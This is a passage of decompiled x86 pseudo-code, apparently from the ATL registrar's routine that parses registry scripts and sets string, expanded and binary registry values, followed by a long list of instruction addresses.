                      								__ecx =  &_v240;
                      								__eax = L00951F30( &_v240, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v220;
                      								__eax = L00951F30( &_v220, __eflags);
                      								goto L77;
                      							} else {
                      								__edx = _v52;
                      								_v2744 = E00942E00(__ecx, __eflags, _v52);
                      								_v8 = 3;
                      								__ecx =  &_v284;
                      								__eax = E00944220( &_v284, __eflags);
                      								_v8 = 2;
                      								__ecx =  &_v240;
                      								__eax = L00951F30( &_v240, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v220;
                      								__eax = L00951F30( &_v220, __eflags);
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E0094F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00944220(__ecx, __eflags) = _v2744;
                      								goto L206;
                      							}
                      						case 9:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L126:
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax =  &_v96;
                      								__ecx =  &_v84;
                      								__edx =  &_v72;
                      								__eax = _a8;
                      								__ecx =  *_a8;
                      								__edx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v289 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__edx = _a4;
                      								_v44 = _a4;
                      								_v289 = 1;
                      							}
                      							__ecx =  &_v308;
                      							__eax = E0094E200( &_v308);
                      							_v8 = 5;
                      							__ecx =  &_v328;
                      							__eax = E0094E200( &_v328);
                      							_v8 = 6;
                      							_v340 = 0;
                      							_v352 = 0;
                      							__eax =  &_v340;
                      							__ecx =  &_v308;
                      							__edx = _v96;
                      							__eax = _a12;
                      							__ecx = _v28;
                      							_v56 = E00948100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v308,  &_v340);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__ecx =  &_v352;
                      									__edx =  &_v328;
                      									__eax = _v84;
                      									__ecx = _a12;
                      									__ecx = _v28;
                      									_v56 = E00948100(__ebx, _v28,  &_v328, __edi, __esi, _a12, _v84,  &_v328,  &_v352);
                      								}
                      							}
                      							__eflags = _v84;
                      							if(_v84 == 0) {
                      								_v2856 = "default";
                      							} else {
                      								__eflags = _v352;
                      								if(_v352 == 0) {
                      									__eax = _v328;
                      									_v2852 = _v328;
                      								} else {
                      									__edx = _v352;
                      									_v2852 = _v352;
                      								}
                      								__ecx = _v2852;
                      								_v2856 = _v2852;
                      							}
                      							__eflags = _v340;
                      							if(__eflags == 0) {
                      								__eax = _v308;
                      								_v2860 = _v308;
                      							} else {
                      								__edx = _v340;
                      								_v2860 = _v340;
                      							}
                      							__ecx = _v2856;
                      							_push(_v2856);
                      							__edx = _v2860;
                      							__ecx = 0xb337ac;
                      							__eax = E0094F1F0(0xb337ac);
                      							__ecx =  &_v2760;
                      							E009423B0( &_v2760, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x265) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2860);
                      							__eflags = _v340;
                      							if(_v340 == 0) {
                      								__ecx = _v308;
                      								_v2864 = _v308;
                      							} else {
                      								__eax = _v340;
                      								_v2864 = _v340;
                      							}
                      							__edx = _v2864;
                      							_v360 = _v2864;
                      							__eax = _v360;
                      							__eax = E00992E00(_v360);
                      							_v364 = __eax;
                      							__ecx =  &_v1396;
                      							__eax = E0094EAC0( &_v1396);
                      							_v8 = 7;
                      							_v8 = 8;
                      							__ecx = _v364;
                      							__ecx =  &_v1396;
                      							__eax = E0094EA30(__ebx,  &_v1396, __eflags, _v364);
                      							_v8 = 7;
                      							__ecx =  &_v1396;
                      							__eax = E0094EA70( &_v1396);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								_v2768 = 0x8007000e;
                      								_v8 = 6;
                      								__ecx =  &_v1396;
                      								__eax = E0094EA80( &_v1396);
                      								_v8 = 5;
                      								__ecx =  &_v328;
                      								__eax = L00951F30( &_v328, __eflags);
                      								_v8 = 1;
                      								__ecx =  &_v308;
                      								__eax = L00951F30( &_v308, __eflags);
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E0094F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00944220(__ecx, __eflags) = _v2768;
                      								goto L206;
                      							} else {
                      								__ecx =  &_v1396;
                      								_v1404 = E0094EA70( &_v1396);
                      								__edx = _v360;
                      								_v1408 = _v360;
                      								_v364 = 0;
                      								while(1) {
                      									__eax = _v1408;
                      									__ecx =  *_v1408;
                      									__eflags =  *_v1408;
                      									if( *_v1408 == 0) {
                      										break;
                      									}
                      									__esi = __esp;
                      									__edx = _v1408;
                      									__eax = CharNextA(_v1408);
                      									__eflags = __esp - __esp;
                      									_v1412 = __eax;
                      									__eax = _v1408;
                      									__ecx =  *_v1408;
                      									__eflags =  *_v1408 - 0x5c;
                      									if( *_v1408 != 0x5c) {
                      										L104:
                      										__ecx = _v1404;
                      										__edx = _v1408;
                      										__al =  *_v1408;
                      										 *_v1404 = __al;
                      										__esi = __esp;
                      										__ecx = _v1408;
                      										__edx =  *_v1408 & 0x000000ff;
                      										__eax = IsDBCSLeadByte( *_v1408 & 0x000000ff);
                      										__eflags = __esi - __esp;
                      										__eax = E009D1520(__eax, __esi - __esp);
                      										__eflags = __eax;
                      										if(__eax == 0) {
                      											L108:
                      											_v1404 = _v1404 + 1;
                      											_v1404 = _v1404 + 1;
                      											__edx = _v1408;
                      											__edx =  &(_v1408[1]);
                      											__eflags = __edx;
                      											_v1408 = __edx;
                      											L109:
                      											_v364 = _v364 + 1;
                      											_v364 = _v364 + 1;
                      											continue;
                      										}
                      										_v1404 = _v1404 + 1;
                      										_v1404 = _v1404 + 1;
                      										_v1408 =  &(_v1408[1]);
                      										_v1408 =  &(_v1408[1]);
                      										__edx = _v1408;
                      										__eax =  *_v1408;
                      										__eflags =  *_v1408;
                      										if( *_v1408 != 0) {
                      											__ecx = _v1404;
                      											__edx = _v1408;
                      											__al =  *_v1408;
                      											 *_v1404 = __al;
                      											goto L108;
                      										}
                      										break;
                      									}
                      									__edx = _v1412;
                      									__eax =  *_v1412;
                      									__eflags =  *_v1412 - 0x30;
                      									if( *_v1412 != 0x30) {
                      										goto L104;
                      									}
                      									__ecx = _v1404;
                      									 *_v1404 = 0;
                      									_v1404 = _v1404 + 1;
                      									_v1404 = _v1404 + 1;
                      									__esi = __esp;
                      									__eax = _v1412;
                      									__eax = CharNextA(_v1412);
                      									__eflags = __esi - __esp;
                      									_v1408 = __eax;
                      									goto L109;
                      								}
                      								__ecx = _v1404;
                      								 *_v1404 = 0;
                      								_v1404 = _v1404 + 1;
                      								_v1404 = _v1404 + 1;
                      								__eax = _v1404;
                      								 *_v1404 = 0;
                      								__ecx =  &_v1428;
                      								__eax = E009441C0( &_v1428, 0);
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v1428 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v1428 = _v44;
                      								}
                      								__eflags = _v84;
                      								if(_v84 == 0) {
                      									_v2872 = 0;
                      								} else {
                      									__eflags = _v352;
                      									if(_v352 == 0) {
                      										__ecx = _v328;
                      										_v2868 = _v328;
                      									} else {
                      										__eax = _v352;
                      										_v2868 = _v352;
                      									}
                      									__edx = _v2868;
                      									_v2872 = _v2868;
                      								}
                      								__ecx =  &_v1396;
                      								E0094EA70( &_v1396) = _v2872;
                      								__ecx =  &_v1428;
                      								_v52 = E00944960( &_v1428, __esi, _v2872, _v2872);
                      								_v1428 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__edx = _v289 & 0x000000ff;
                      									__eflags = _v289 & 0x000000ff;
                      									if(__eflags != 0) {
                      										_v44 = 0;
                      									}
                      									__ecx =  &_v1428;
                      									__eax = E00944220( &_v1428, __eflags);
                      									_v8 = 6;
                      									__ecx =  &_v1396;
                      									__eax = E0094EA80( &_v1396);
                      									_v8 = 5;
                      									__ecx =  &_v328;
                      									__eax = L00951F30( &_v328, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v308;
                      									__eax = L00951F30( &_v308, __eflags);
                      									goto L126;
                      								} else {
                      									__ecx = _v52;
                      									_v2764 = E00942E00(_v52, __eflags, _v52);
                      									__ecx =  &_v1428;
                      									__eax = E00944220( &_v1428, __eflags);
                      									_v8 = 6;
                      									__ecx =  &_v1396;
                      									__eax = E0094EA80( &_v1396);
                      									_v8 = 5;
                      									__ecx =  &_v328;
                      									__eax = L00951F30( &_v328, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v308;
                      									__eax = L00951F30( &_v308, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2764;
                      									goto L206;
                      								}
                      							}
                      						case 0xa:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L160:
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx =  &_v96;
                      								__edx =  &_v84;
                      								__eax =  &_v72;
                      								__ecx = _a8;
                      								__edx =  *_a8;
                      								__eax =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v1433 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__eax = _a4;
                      								_v44 = _a4;
                      								_v1433 = 1;
                      							}
                      							__ecx =  &_v1452;
                      							__eax = E0094E200( &_v1452);
                      							_v8 = 0xa;
                      							__ecx =  &_v1472;
                      							__eax = E0094E200( &_v1472);
                      							_v8 = 0xb;
                      							_v1484 = 0;
                      							_v1496 = 0;
                      							__ecx =  &_v1508;
                      							__edx = _v96;
                      							__eax = _a16;
                      							__ecx = _v28;
                      							_v56 = E00948330(_v28, _a16, _v96,  &_v1508);
                      							__eflags = _v56 - 1;
                      							if(_v56 != 1) {
                      								L137:
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									__eflags = _v84;
                      									if(_v84 != 0) {
                      										__eax =  &_v1496;
                      										__ecx =  &_v1472;
                      										__edx = _v84;
                      										__eax = _a12;
                      										__ecx = _v28;
                      										_v56 = E00948100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1472,  &_v1496);
                      									}
                      								}
                      								__ecx =  &_v1540;
                      								__eax = E009441C0( &_v1540, 0);
                      								_v8 = 0xc;
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v1540 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v1540 = _v44;
                      								}
                      								__eflags = _v1496;
                      								if(_v1496 == 0) {
                      									__ecx = _v1472;
                      									_v2880 = _v1472;
                      								} else {
                      									__eax = _v1496;
                      									_v2880 = _v1496;
                      								}
                      								__edx = _v1508;
                      								__eax = _v2880;
                      								__ecx =  &_v1540;
                      								_v52 = E009447C0( &_v1540, __esi, _v2880, _v1508);
                      								_v1540 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__edx = _v1433 & 0x000000ff;
                      									__eflags = _v1433 & 0x000000ff;
                      									if((_v1433 & 0x000000ff) != 0) {
                      										_v44 = 0;
                      									}
                      									__eflags = _v84;
                      									if(_v84 == 0) {
                      										_v2888 = "default";
                      									} else {
                      										__eflags = _v1496;
                      										if(_v1496 == 0) {
                      											__ecx = _v1472;
                      											_v2884 = _v1472;
                      										} else {
                      											__eax = _v1496;
                      											_v2884 = _v1496;
                      										}
                      										__edx = _v2884;
                      										_v2888 = _v2884;
                      									}
                      									__eflags = _v1484;
                      									if(__eflags == 0) {
                      										__ecx = _v1452;
                      										_v2892 = _v1452;
                      									} else {
                      										__eax = _v1484;
                      										_v2892 = _v1484;
                      									}
                      									__edx = _v2888;
                      									_push(_v2888);
                      									__eax = _v2892;
                      									__ecx = 0xb337ac;
                      									__eax = E0094F1F0(0xb337ac);
                      									__ecx =  &_v2784;
                      									E009423B0( &_v2784, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2d2) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2892);
                      									_v8 = 0xb;
                      									__ecx =  &_v1540;
                      									__eax = E00944220( &_v1540, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = L00951F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = L00951F30( &_v1452, __eflags);
                      									goto L160;
                      								} else {
                      									__ecx = _v52;
                      									_v2776 = E00942E00(_v52, __eflags, _v52);
                      									_v8 = 0xb;
                      									__ecx =  &_v1540;
                      									__eax = E00944220( &_v1540, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = L00951F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = L00951F30( &_v1452, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2776;
                      									goto L206;
                      								}
                      							} else {
                      								__ecx =  &_v1484;
                      								__edx =  &_v1452;
                      								__eax = _v1508;
                      								__ecx = _a12;
                      								__ecx = _v28;
                      								__eax = E00948100(__ebx, _v28,  &_v1452, __edi, __esi, _a12, _v1508,  &_v1452,  &_v1484);
                      								__eflags = _v1484;
                      								if(__eflags == 0) {
                      									__eax = _v1452;
                      									_v2876 = _v1452;
                      								} else {
                      									__edx = _v1484;
                      									_v2876 = _v1484;
                      								}
                      								__ecx = _v2876;
                      								__ecx =  &_v1520;
                      								__eax = E0094E4E0(__ebx,  &_v1520, __eflags, _v2876);
                      								__esi = __esp;
                      								__edx =  &_v1508;
                      								_push( &_v1508);
                      								_push(0);
                      								_push(0);
                      								__ecx =  &_v1520;
                      								__eax = E0094E570( &_v1520);
                      								_push(__eax);
                      								__imp__#277();
                      								__eflags = __esi - __esp;
                      								_v56 = __eax;
                      								__eflags = _v56;
                      								if(__eflags >= 0) {
                      									__ecx =  &_v1520;
                      									__eax = E0094E4B0( &_v1520, __eflags);
                      									goto L137;
                      								} else {
                      									_v2772 = 0x80004005;
                      									__ecx =  &_v1520;
                      									__eax = E0094E4B0( &_v1520, __eflags);
                      									_v8 = 0xa;
                      									__ecx =  &_v1472;
                      									__eax = L00951F30( &_v1472, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1452;
                      									__eax = L00951F30( &_v1452, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2772;
                      									goto L206;
                      								}
                      							}
                      						case 0xb:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L200:
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v1545 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__ecx = _a4;
                      								_v44 = _a4;
                      								_v1545 = 1;
                      							}
                      							__ecx =  &_v1564;
                      							__eax = E0094E200( &_v1564);
                      							_v8 = 0xd;
                      							__ecx =  &_v1584;
                      							__eax = E0094E200( &_v1584);
                      							_v8 = 0xe;
                      							_v1596 = 0;
                      							_v1608 = 0;
                      							__ecx =  &_v2656;
                      							__eax = E0094E010( &_v2656);
                      							_v8 = 0xf;
                      							__edx =  &_v2668;
                      							__eax =  &_v1620;
                      							__ecx = _v96;
                      							__edx = _a20;
                      							__ecx = _v28;
                      							_v56 = E00948370(_v28, _a20, _v96,  &_v1620,  &_v2668);
                      							__eflags = _v56 - 1;
                      							if(_v56 != 1) {
                      								L177:
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									__eflags = _v84;
                      									if(_v84 != 0) {
                      										__eax =  &_v1608;
                      										__ecx =  &_v1584;
                      										__edx = _v84;
                      										__eax = _a12;
                      										__ecx = _v28;
                      										_v56 = E00948100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1584,  &_v1608);
                      									}
                      								}
                      								__ecx =  &_v2696;
                      								__eax = E009441C0( &_v2696, 0);
                      								_v8 = 0x12;
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v2696 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v2696 = _v44;
                      								}
                      								__eflags = _v1608;
                      								if(_v1608 == 0) {
                      									__ecx = _v1584;
                      									_v2896 = _v1584;
                      								} else {
                      									__eax = _v1608;
                      									_v2896 = _v1608;
                      								}
                      								__edx = _v2668;
                      								__eax = _v1620;
                      								__ecx = _v2896;
                      								__ecx =  &_v2696;
                      								_v52 = E00944740(__ecx, __esi, _v2896, _v1620, _v2668);
                      								_v2696 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__eax = _v1545 & 0x000000ff;
                      									__eflags = _v1545 & 0x000000ff;
                      									if((_v1545 & 0x000000ff) != 0) {
                      										_v44 = 0;
                      									}
                      									__eflags = _v84;
                      									if(_v84 == 0) {
                      										_v2904 = "default";
                      									} else {
                      										__eflags = _v1608;
                      										if(_v1608 == 0) {
                      											__edx = _v1584;
                      											_v2900 = _v1584;
                      										} else {
                      											__ecx = _v1608;
                      											_v2900 = _v1608;
                      										}
                      										__eax = _v2900;
                      										_v2904 = _v2900;
                      									}
                      									__eflags = _v1596;
                      									if(__eflags == 0) {
                      										__edx = _v1564;
                      										_v2908 = _v1564;
                      									} else {
                      										__ecx = _v1596;
                      										_v2908 = _v1596;
                      									}
                      									__eax = _v2904;
                      									_push(_v2904);
                      									__ecx = _v2908;
                      									__ecx = 0xb337ac;
                      									__eax = E0094F1F0(0xb337ac);
                      									__ecx =  &_v2812;
                      									E009423B0( &_v2812, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x311) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2908);
                      									_v8 = 0xf;
                      									__ecx =  &_v2696;
                      									__eax = E00944220( &_v2696, __eflags);
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E0094DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = L00951F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = L00951F30( &_v1564, __eflags);
                      									goto L200;
                      								} else {
                      									__edx = _v52;
                      									_v2804 = E00942E00(__ecx, __eflags, _v52);
                      									_v8 = 0xf;
                      									__ecx =  &_v2696;
                      									__eax = E00944220( &_v2696, __eflags);
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E0094DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = L00951F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = L00951F30( &_v1564, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2804;
                      									goto L206;
                      								}
                      							} else {
                      								__eax =  &_v1596;
                      								__ecx =  &_v1564;
                      								__edx = _v2668;
                      								__eax = _a12;
                      								__ecx = _v28;
                      								__eax = E00948100(__ebx, _v28, _v2668, __edi, __esi, _a12, _v2668,  &_v1564,  &_v1596);
                      								__eflags = _v1596;
                      								if(_v1596 == 0) {
                      									__ecx = _v1564;
                      									_v1596 = _v1564;
                      								}
                      								__edx = _v1596;
                      								_v2676 = E00992E00(_v1596);
                      								_v2676 = _v2676 & 0x00000001;
                      								__eflags = _v2676 & 0x00000001;
                      								if(__eflags == 0) {
                      									__eax = _v2676;
                      									asm("cdq");
                      									_v2676 - __edx = _v2676 - __edx >> 1;
                      									_v2668 = _v2676 - __edx >> 1;
                      									_v8 = 0x10;
                      									__ecx = _v2668;
                      									__ecx =  &_v2656;
                      									__eax = E0094DF80(__ebx,  &_v2656, __eflags, _v2668);
                      									_v8 = 0xf;
                      									__ecx =  &_v2656;
                      									__eax = E0094DFC0( &_v2656);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__ecx =  &_v2656;
                      										_v1620 = E0094DFC0( &_v2656);
                      										__edx = _v2668;
                      										_v1620 = E0095AF80(__edi, _v1620, 0, _v2668);
                      										_v2680 = 0;
                      										while(1) {
                      											__edx = _v2680;
                      											__eflags = _v2680 - _v2676;
                      											if(_v2680 >= _v2676) {
                      												goto L177;
                      											}
                      											_v2680 = _v2680 & 0x00000001;
                      											1 = 1 - (_v2680 & 0x00000001);
                      											__esi = 1 - (_v2680 & 0x00000001) << 2;
                      											_v1596 = _v1596 + _v2680;
                      											__edx =  *(_v1596 + _v2680) & 0x000000ff;
                      											__ecx = _v28;
                      											__eax = L00947FE0(__ebx, _v28, __edi, __esi,  *(_v1596 + _v2680) & 0x000000ff);
                      											__edi = __al & 0x000000ff;
                      											__ecx = 1;
                      											__edi = (__al & 0x000000ff) << __cl;
                      											__eax = _v2680;
                      											asm("cdq");
                      											_v2680 - __edx = _v2680 - __edx >> 1;
                      											_v1620 =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff;
                      											__ecx =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff | __edi;
                      											__eax = _v2680;
                      											asm("cdq");
                      											__eax = _v2680 - __edx;
                      											__eax = _v2680 - __edx >> 1;
                      											__edx = _v1620;
                      											 *(_v1620 + __eax) = __cl;
                      											__ecx = _v2680;
                      											__ecx = _v2680 + 1;
                      											__eflags = __ecx;
                      											_v2680 = __ecx;
                      										}
                      										goto L177;
                      									} else {
                      										_v2800 = 0x8007000e;
                      										_v8 = 0xe;
                      										__ecx =  &_v2656;
                      										__eax = E0094DFD0( &_v2656);
                      										_v8 = 0xd;
                      										__ecx =  &_v1584;
                      										__eax = L00951F30( &_v1584, __eflags);
                      										_v8 = 1;
                      										__ecx =  &_v1564;
                      										__eax = L00951F30( &_v1564, __eflags);
                      										_v8 = 0;
                      										__ecx =  &_v124;
                      										__eax = E0094F220( &_v124);
                      										_v8 = 0xffffffff;
                      										__ecx =  &_v44;
                      										E00944220(__ecx, __eflags) = _v2800;
                      										goto L206;
                      									}
                      								} else {
                      									_push("Binary Data does not fall on BYTE boundries\n");
                      									_push(0);
                      									__ecx = 0xb337ac;
                      									_push(E0094F1F0(0xb337ac));
                      									__ecx =  &_v2792;
                      									_push(E009423B0( &_v2792, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2f3));
                      									__eax = E009423E0(__ebx, __edi, __esi, __eflags);
                      									__esp = __esp + 0x10;
                      									_v2796 = 0x80004005;
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E0094DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = L00951F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = L00951F30( &_v1564, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2796;
                      									L206:
                      									_push(_t805);
                      									_push(_t769);
                      									E009D14C0(_t817, 0x949db8);
                      									_pop(_t771);
                      									_pop(_t810);
                      									 *[fs:0x0] = _v16;
                      									_pop(_t814);
                      									_pop(_t816);
                      									_pop(_t779);
                      									return E009D1520(E00957280(_t771, _t779, _v24 ^ _t817, _t810, _t814, _t816), _t817 - _t820 + 0xb58);
                      								}
                      							}
                      					}
                      				}
                      				_t807 =  &(( *_a8)[1]);
                      				__eflags = _t807;
                      				 *_a8 = _t807;
                      				_t805 =  *_a8;
                      				E0094A0F0(_v28,  *_t805,  &_v72,  &_v84,  &_v96);
                      				_v2816 = _v56;
                      				_v8 = 0;
                      				E0094F220( &_v124);
                      				_v8 = 0xffffffff;
                      				E00944220( &_v44, __eflags);
                      				_t769 = _v2816;
                      				goto L206;
                      			}
                      0x0094960a
                      0x0094960e
                      0x0094961b
                      0x0094961e
                      0x00949610
                      0x00949610
                      0x00949613
                      0x00949613
                      0x00949624
                      0x0094962b
                      0x0094963b
                      0x00949641
                      0x0094962d
                      0x0094962d
                      0x00949633
                      0x00949633
                      0x00949647
                      0x0094964e
                      0x00949655
                      0x00949660
                      0x00949663
                      0x0094966d
                      0x00949671
                      0x009496d8
                      0x009496df
                      0x009496e1
                      0x009496e3
                      0x009496e3
                      0x009496ea
                      0x009496ee
                      0x00949721
                      0x009496f0
                      0x009496f0
                      0x009496f7
                      0x00949707
                      0x0094970d
                      0x009496f9
                      0x009496f9
                      0x009496ff
                      0x009496ff
                      0x00949713
                      0x00949719
                      0x00949719
                      0x0094972b
                      0x00949732
                      0x00949742
                      0x00949748
                      0x00949734
                      0x00949734
                      0x0094973a
                      0x0094973a
                      0x0094974e
                      0x00949754
                      0x00949755
                      0x00949763
                      0x00949768
                      0x00949778
                      0x00949784
                      0x0094978c
                      0x00949790
                      0x00949796
                      0x0094979b
                      0x0094979f
                      0x009497a5
                      0x009497aa
                      0x009497ae
                      0x009497b4
                      0x00000000
                      0x00949673
                      0x00949673
                      0x0094967f
                      0x00949685
                      0x00949689
                      0x0094968f
                      0x00949694
                      0x00949698
                      0x0094969e
                      0x009496a3
                      0x009496a7
                      0x009496ad
                      0x009496b2
                      0x009496b6
                      0x009496b9
                      0x009496be
                      0x009496c5
                      0x009496cd
                      0x00000000
                      0x009496cd
                      0x009494e3
                      0x009494e3
                      0x009494ea
                      0x009494f1
                      0x009494f8
                      0x009494fc
                      0x009494ff
                      0x00949504
                      0x0094950b
                      0x0094951b
                      0x00949521
                      0x0094950d
                      0x0094950d
                      0x00949513
                      0x00949513
                      0x00949527
                      0x0094952e
                      0x00949534
                      0x00949539
                      0x0094953b
                      0x00949541
                      0x00949542
                      0x00949544
                      0x00949546
                      0x0094954c
                      0x00949551
                      0x00949552
                      0x00949558
                      0x0094955f
                      0x00949562
                      0x00949566
                      0x009495c1
                      0x009495c7
                      0x00000000
                      0x00949568
                      0x00949568
                      0x00949572
                      0x00949578
                      0x0094957d
                      0x00949581
                      0x00949587
                      0x0094958c
                      0x00949590
                      0x00949596
                      0x0094959b
                      0x0094959f
                      0x009495a2
                      0x009495a7
                      0x009495ae
                      0x009495b6
                      0x00000000
                      0x009495b6
                      0x00949566
                      0x00000000
                      0x009497e7
                      0x009497eb
                      0x00949ccc
                      0x00949ccc
                      0x00949cd1
                      0x00949cd4
                      0x00949cd7
                      0x00949cd9
                      0x00949cdd
                      0x00949ce1
                      0x00949ce5
                      0x00949ce8
                      0x00949cea
                      0x00949ced
                      0x00949cf0
                      0x00000000
                      0x00949cf0
                      0x009497f1
                      0x009497f8
                      0x009497fc
                      0x009497fe
                      0x00949801
                      0x00949804
                      0x00949804
                      0x0094980b
                      0x00949811
                      0x00949816
                      0x0094981a
                      0x00949820
                      0x00949825
                      0x00949829
                      0x00949833
                      0x0094983d
                      0x00949843
                      0x00949848
                      0x0094984c
                      0x00949853
                      0x0094985a
                      0x0094985e
                      0x00949862
                      0x0094986a
                      0x0094986d
                      0x00949871
                      0x00949aba
                      0x00949aba
                      0x00949abe
                      0x00949ac0
                      0x00949ac4
                      0x00949ac6
                      0x00949acd
                      0x00949ad4
                      0x00949ad8
                      0x00949adc
                      0x00949ae4
                      0x00949ae4
                      0x00949ac4
                      0x00949ae9
                      0x00949aef
                      0x00949af4
                      0x00949af8
                      0x00949afc
                      0x00949b09
                      0x00949b0c
                      0x00949afe
                      0x00949afe
                      0x00949b01
                      0x00949b01
                      0x00949b12
                      0x00949b19
                      0x00949b29
                      0x00949b2f
                      0x00949b1b
                      0x00949b1b
                      0x00949b21
                      0x00949b21
                      0x00949b35
                      0x00949b3c
                      0x00949b43
                      0x00949b4a
                      0x00949b55
                      0x00949b58
                      0x00949b62
                      0x00949b66
                      0x00949bdc
                      0x00949be3
                      0x00949be5
                      0x00949be7
                      0x00949be7
                      0x00949bee
                      0x00949bf2
                      0x00949c25
                      0x00949bf4
                      0x00949bf4
                      0x00949bfb
                      0x00949c0b
                      0x00949c11
                      0x00949bfd
                      0x00949bfd
                      0x00949c03
                      0x00949c03
                      0x00949c17
                      0x00949c1d
                      0x00949c1d
                      0x00949c2f
                      0x00949c36
                      0x00949c46
                      0x00949c4c
                      0x00949c38
                      0x00949c38
                      0x00949c3e
                      0x00949c3e
